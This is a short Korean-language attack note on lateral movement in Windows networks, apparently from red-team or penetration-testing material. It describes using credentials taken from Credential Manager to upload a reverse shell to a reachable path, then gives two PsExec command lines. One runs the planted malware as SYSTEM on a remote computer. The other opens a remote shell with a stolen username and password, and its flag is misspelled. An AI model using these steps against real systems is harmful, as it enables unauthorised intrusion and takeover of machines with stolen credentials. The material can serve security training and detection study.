Credential Manager에서 확보한 자격 증명이 있다면 해당 컴퓨터의 시스템 쉘을 획득할 수 있습니다.
먼저 대상 호스트의 파일 공유 서버나 파일 업로드 등을 통해
알 수 있는 경로의 위치에 리버스 쉘을 업로드 시킨 이후
장악한 계정의 쉘에서 다음 명령을 실행합니다.
# 측면이동 하려는 컴퓨터에 설치한 악성코드 경로를 시스템 권한으로 실행
.\PsExec.exe -acceptula \\<Computer Name> -s -d cmd.exe /c <PATH>
# 측면이동 하려는 컴퓨터의 쉘을 획득
.\PsExec.exe -acceptula \\<Remote IP> -u <USER> -p <PASS> cmd
